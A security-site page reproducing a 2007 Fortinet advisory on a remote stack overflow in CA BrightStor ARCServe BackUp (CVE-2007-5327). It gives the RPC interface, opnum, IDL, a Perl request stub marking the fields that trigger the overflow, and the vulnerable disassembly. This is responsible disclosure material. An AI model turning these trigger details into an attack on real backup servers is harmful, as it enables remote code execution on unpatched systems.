SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
IT News
Search
SecurityAlert Database
About SecurityAlert
ExploitAlert Database
SecurityReason Research
WLB
WLB Database
Send to WLB
About WLB
Services
Security Audit
Schedule
Prices of services
Contact
RSS
SecurityReason IT News
SecurityAlert
World Laboratory of Bugtraq
ExploitAlert
Apache
PHP
Corporate
Contact
About SecurityReason
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com
Home arrow SecurityAlert Database

Arrow  Topic :

CA BrightStor ARCServe BackUp Message Engine Remote Stack Overflow Vulnerability


Arrow  SecurityAlert : 3218
Arrow  CVE : CVE-2007-5327
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Available : No
Arrow  Credit : cocoruder
Arrow  Published : 14.10.2007

Arrow  Affected Software : CA BrightStor ARCServe BackUp R11.5



Arrow  Advisory Content :  

hi full-disclosure,

CA BrightStor ARCServe BackUp Message Engine Remote Stack Overflow
Vulnerability

by cocoruder of Fortinet Security Research Team

http://ruder.cdut.net

Summary:

A remote stack overflow vulnerability exist in the RPC interface of CA
BrightStor ARCServe BackUp. An arbitrary anonymous attacker can execute
arbitrary code on the affected system by exploiting this vulnerability.

Affected Software Versions:

CA BrightStor ARCServe BackUp R11.5

Details::

The flaw specifically exits within the CA BrightStor Message Engine due to
incorrect handling of RPC requests on TCP port 6504. The interface is
identified by 506b1890-14c8-11d1-bbc3-00805fa6962e v1.0. Opnum 0x10d
specifies the vulnerable operation within this interface.

Function 0x10d's IDL as follows:

long sub_28EA5F70 (

[in] handle_t arg_1,

[in, out][size_is(256), length_is(1)] struct struct_2 * arg_2,

[in][string] char * arg_3,

[in][string] char * arg_4,

[in][string] char * arg_5,

[in][string] char * arg_6,

[in][string] char * arg_7,

[in] long arg_8,

[out][size_is(arg_1)] byte * arg_9

);

The following is the normal stub of this function:

my $stub=

"x00x01x00x00x00x00x00x00x01x00x00x00x00x00x00x00".

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".

"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".

"x00x00x00x00x00x00x00x00x00x00x00x00".

"x10x00x00x00x00x00x00x00". #point1: the victim's computer name

"x10x00x00x00".

"kkk-49ade5b31c1".

"x00".

"x09x00x00x00x00x00x00x00x09x00x00x00". #point2: a string,set it long

"Database".

"x00x00x00x00".

"x01x00x00x00x00x00x00x00x01x00x00x00".

"x00x00x00x00".

"x1ax00x00x00x00x00x00x00x1ax00x00x00".

"RemoteDatabaseMachineName".

"x00x00x00".

"x01x00x00x00x00x00x00x00x01x00x00x00".

"x00x79x49x6ex40x00x00x00";

When we set #point1 equal to the victim's computer name, and set #point2 is
a long string, there will cause a stack base overflow vulnerability. The
vulnerable code as follows:

.text:25604EF8 lea edx, [esp+120h+SubKey]

.text:25604EFC push offset asc_2561E2BC

.text:25604F01 push edx ;

.text:25604F02 call edi ; lstrcatA ;

.text:25604F04 lea eax, [esp+120h+SubKey]

.text:25604F08 push esi ;

.text:25604F09 push eax

.text:25604F0A call edi ; lstrcatA ; overflow!

Solution:

CA has released an advisory for this vulnerability which is available on:

http://supportconnectw.ca.com/public/storage/infodocs/basb-secnotice.asp

Fortinet advisory can be found at:

http://www.fortiguardcenter.com

CVE Information:

CVE-2007-5327

Disclosure Timeline:

2007.04.11 Vendor notified via email

2007.04.12 Vendor responded

2007.10.11 Final public disclosure

Disclaimer:

Although Fortinet has attempted to provide accurate information in

these materials, Fortinet assumes no legal responsibility for the

accuracy or completeness of the information. More specific information

is available on request from Fortinet. Please note that Fortinet's

product information does not constitute or contain any guarantee,

warranty or legally binding representation, unless expressly

identified as such in a duly signed writing.

Fortinet Security Research

secresearch (at) fortinet (dot) com [email concealed]

http://www.fortinet.com

Best Regards,

¡¡¡¡¡¡¡¡¡¡¡¡
61;¡¡¡Haifei Li

¡¡¡¡¡¡¡¡¡¡¡¡
61;¡¡¡hfli (at) fortinet (dot) com [email concealed]

¡¡¡¡¡¡¡¡¡¡¡¡
61;¡¡¡¡¡¡¡2007-10-11






Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...
Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration
PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass
Copyright © SecurityReason.com. All Rights Reserved.